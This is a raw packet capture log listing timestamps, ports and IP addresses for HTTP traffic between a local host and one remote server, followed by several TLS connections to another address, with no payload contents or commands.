Nov 15, 2024 14:09:11.549108982 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.549117088 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549130917 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549141884 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.549156904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549164057 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.549206018 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.549659967 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549671888 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549681902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549691916 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549705029 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549709082 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.549716949 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549731970 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.549772978 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.549845934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549859047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549870014 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549882889 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549894094 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.549899101 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.549916983 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.549945116 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.550010920 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550024033 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550034046 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550045013 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550055027 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550071955 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.550103903 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.550549984 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550563097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550573111 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550642967 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.550731897 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550746918 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550751925 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550761938 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550767899 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550780058 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550791025 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550801039 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550802946 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.550816059 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.550848007 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.550889015 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550900936 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550910950 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550923109 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550934076 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.550945044 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.550961018 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.551011086 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.551507950 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.551522017 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.551533937 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.551547050 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.551557064 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.551564932 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.551572084 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.551584959 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.551597118 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.551605940 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.551609993 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.551626921 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.551637888 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.551671982 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615040064 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615073919 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615091085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615149021 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615216017 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615226030 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615231991 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615248919 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615262032 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615267992 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615291119 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615331888 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615514040 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615529060 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615542889 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615556955 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615571976 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615580082 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615587950 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615612030 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615642071 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615833998 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615858078 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615873098 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615880013 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615889072 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615894079 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615905046 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615916967 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615920067 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.615938902 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.615981102 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.616206884 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.616221905 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.616236925 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.616408110 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:14.178659916 CET	49734	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:14.178750992 CET	443	49734	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:14.178837061 CET	49734	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:14.179035902 CET	49734	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:14.179060936 CET	443	49734	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:14.305913925 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:14.305959940 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:14.306200027 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:14.306432009 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:14.306442976 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:14.393691063 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:14.393718004 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:14.394083977 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:14.394501925 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:14.394515038 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:14.424674034 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:14.424720049 CET	443	49739	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:14.424948931 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:14.425410032 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:14.425426006 CET	443	49739	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.049519062 CET	443	49734	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.049901962 CET	49734	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.049979925 CET	443	49734	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.051642895 CET	443	49734	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.051724911 CET	49734	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.053076029 CET	49734	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.053172112 CET	443	49734	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.053253889 CET	49734	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.095336914 CET	443	49734	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.102009058 CET	49734	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.102041006 CET	443	49734	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.148830891 CET	49734	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.166368008 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.166914940 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.166954041 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.168395042 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.168478012 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.168853998 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.168948889 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.169662952 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.169682980 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.211328983 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.254827976 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.255340099 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.255356073 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.256788015 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.257042885 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.257312059 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.257358074 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.257365942 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.257402897 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.271497965 CET	443	49739	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.271725893 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.271795034 CET	443	49739	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.275027990 CET	443	49739	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.275110006 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.275432110 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.275521994 CET	443	49739	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.275563002 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.305157900 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.305172920 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.319330931 CET	443	49739	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.320761919 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.320780039 CET	443	49739	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.327265978 CET	443	49734	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.352014065 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.367639065 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.367719889 CET	49734	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.367782116 CET	443	49734	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.369595051 CET	49734	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.369767904 CET	443	49734	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.369856119 CET	49734	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.457627058 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.457694054 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.457741976 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.457787037 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.457811117 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.457926035 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.457926035 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.457958937 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.458156109 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.461716890 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.465971947 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.466233015 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.466294050 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.508383036 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.508446932 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.545171022 CET	443	49739	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.553616047 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.553709030 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.553757906 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.553802967 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.553809881 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.553828955 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.553869963 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.553875923 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.553893089 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.553920031 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.555280924 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.562549114 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.562611103 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.562622070 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.576905012 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.577133894 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.577214003 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.577327013 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.577394009 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.577455044 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.581638098 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.586421013 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.586483002 CET	443	49739	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.587379932 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.587671995 CET	443	49739	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.587871075 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.587899923 CET	443	49739	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.587963104 CET	49739	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.590389013 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.590442896 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.590467930 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.590508938 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.590737104 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.598944902 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.607755899 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.607865095 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.607923985 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.607990980 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.608074903 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.616352081 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.617618084 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.617634058 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.625611067 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.625731945 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.625813961 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.625880003 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.625961065 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.633034945 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.641710997 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.641832113 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.641921997 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.641987085 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.642057896 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.663815975 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.673619032 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.673697948 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.673743010 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.673758030 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.681644917 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.681720018 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.681735039 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.684345961 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.687249899 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.687271118 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.691113949 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.691167116 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.691178083 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.696749926 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.696970940 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.697089911 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.697252035 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.697319031 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.697413921 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.697694063 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.697881937 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.697942019 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.697957039 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.702061892 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.702124119 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.702126980 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.702143908 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.702192068 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.702202082 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.702402115 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.702467918 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.702480078 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.710813046 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.710879087 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.710890055 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.711061954 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.711162090 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.711173058 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.714570045 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.714631081 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.714642048 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.719149113 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.719193935 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.719217062 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.719228029 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.719259024 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.719283104 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.725406885 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.725477934 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.725490093 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.726319075 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.726378918 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.726388931 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.731462955 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.731529951 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.731542110 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.731645107 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.731704950 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.731717110 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.738420963 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.738500118 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.738516092 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.739558935 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.739631891 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.739644051 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.745609045 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.745672941 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.745683908 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.750853062 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.750922918 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.750935078 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.755687952 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.755750895 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.755764008 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.761826992 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.761890888 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.761902094 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.767877102 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.767946959 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.767957926 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.774029016 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.775262117 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.775281906 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.780226946 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.780298948 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.780311108 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.785881042 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.785967112 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.786081076 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.786147118 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.786220074 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.787678957 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.787749052 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.787765026 CET	443	49738	142.250.185.68	192.168.2.4
